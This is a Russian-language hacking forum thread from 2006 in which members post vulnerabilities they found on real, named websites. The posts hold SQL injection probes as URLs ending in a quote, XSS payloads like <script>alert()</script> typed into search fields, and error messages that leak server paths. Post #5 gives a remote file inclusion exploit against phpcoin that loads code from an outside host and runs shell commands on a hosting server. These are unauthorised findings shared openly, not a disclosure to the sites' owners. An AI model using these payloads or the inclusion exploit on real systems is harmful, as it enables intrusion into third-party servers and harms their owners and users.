ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Баги на сайтах.
  #1  
Старый 28.01.2006, 18:04
Аватар для D1mOn
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839

Репутация: 212
По умолчанию Баги на сайтах.

Очень часто создаются темы типа: Нашел XSS, Нашёл SQL injection. Уже немного надоело. Предлагаю всем найденные вами баги (если вам не терпится показать этот баг всем) постить в эту тему, чтобы не засорять форум!

UPD: никаких рефереров! все линки даем исключительно так _http://

Последний раз редактировалось m0nzt3r; 16.05.2006 в 11:12..
 

  #2  
Старый 28.01.2006, 18:12
Аватар для D1mOn
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839

Репутация: 212
По умолчанию

http://www.generis.ru/?page=press_wholenews&id='
http://www.integracija.gov.lv/forum/?setc=1&forumid='
http://www.mossei.ru/?page='
Вот для начала
 

  #3  
Старый 28.01.2006, 18:13
Аватар для Vandal
Vandal
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281

Репутация: 23
Отправить сообщение для Vandal с помощью Yahoo
По умолчанию

Идея хорошая принципы .

_www.pansionmsu.ru , в строке поиска <script>alert()<script>
_http://msu.ru/ , в строке поиска , <script>alert()<script> не вышел , а <marquee>msu</marquee> выходит .

_http://online.ua/ Строка поиска , <marquee>UA</marquee> , <img src="http://www.online.ua/all/0.gif"> покажет свой собственный логотип который в верхнем левом углу .
 

  #4  
Старый 29.01.2006, 00:44
Аватар для Vandal
Vandal
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281

Репутация: 23
Отправить сообщение для Vandal с помощью Yahoo
По умолчанию

_http://referat.star-info.ru

В поиске если написать <i>i</i> то будет так

Warning: eregi_replace(): REG_EMPTY in /usr/home/www/user/referat.star-info.ru/inc/func on line 73
 

  #5  
Старый 15.02.2006, 00:06
Аватар для Shurik
Shurik
Новичок
Регистрация: 13.02.2006
Сообщений: 24
Провел на форуме:
138596

Репутация: 3
По умолчанию

www.supersait.net.ru/billing/config.php?_CCFG[_PKG_PATH_DBSE]=http://qwe20063.narod.ru/&cmd=id
сам сайт supersait.net.ru нечего из себя не представляет, зато он хостится на очень известном хостинге, до которого можно добраться используя багу в phpcoin.
Тоесть благодаря php include мы можем выполнять никсовые комманды (ls;pwd;echo;cat) на сервере.
 

  #6  
Старый 01.03.2006, 01:21
Аватар для Vandal
Vandal
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281

Репутация: 23
Отправить сообщение для Vandal с помощью Yahoo
По умолчанию

_http://vidahl.agava.ru/cgi-bin/dic.cgi?search=%3Ci%3Ei%3C%2Fi%3E&method=exact




В графе поиск статьи <script>alert()</script>
 

  #7  
Старый 01.03.2006, 19:35
Аватар для Vandal
Vandal
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281

Репутация: 23
Отправить сообщение для Vandal с помощью Yahoo
По умолчанию

Справочник телефонов города Орла

http://www.g-play.ru/orel/

"Поиск организаций по названию, виду деятельности:"

В поиске <script>alert()</script>
 

  #8  
Старый 01.03.2006, 19:56
Аватар для Vandal
Vandal
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281

Репутация: 23
Отправить сообщение для Vandal с помощью Yahoo
По умолчанию

Еще .

1)


url : _http://prohosting.fatpickle.com/search

<script>alert()</script> в поиске .


2)



Url: _http://www.babr.ru/index.php?pt=pages


<script>alert()</script> в поиске .

3)

url : _http://www.ambercity.ru/


<script>alert()</script> в поиске .
 

  #9  
Старый 02.03.2006, 01:38
Аватар для Vandal
Vandal
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281

Репутация: 23
Отправить сообщение для Vandal с помощью Yahoo
По умолчанию

1)


Url :_http://www.cityvision2000.com

Можно узнать путь установки .

В поиске <script>alert()</script>

"D:\Webs\city\www\search.cgi": No such file or directory

2)

url: _http://www.pages.ru/

Поиск <script>alert()</script>
 

  #10  
Старый 03.03.2006, 19:25
Аватар для tclover
tclover
Banned
Регистрация: 13.12.2005
Сообщений: 1,091
Провел на форуме:
9751364

Репутация: 1847


По умолчанию

_http://zna.nu/vg_eng.php?id='
Интересный сайт
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Sql Injections на сайтах Укртелекома Nova Уязвимости 9 23.03.2006 00:35
"Яндекс" будет показывать контекстную рекламу на обычных сайтах dinar_007 Мировые новости 0 23.12.2005 16:22
Xss баги на забугорных сайтах... x-ultra-x Уязвимости 7 07.10.2005 17:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ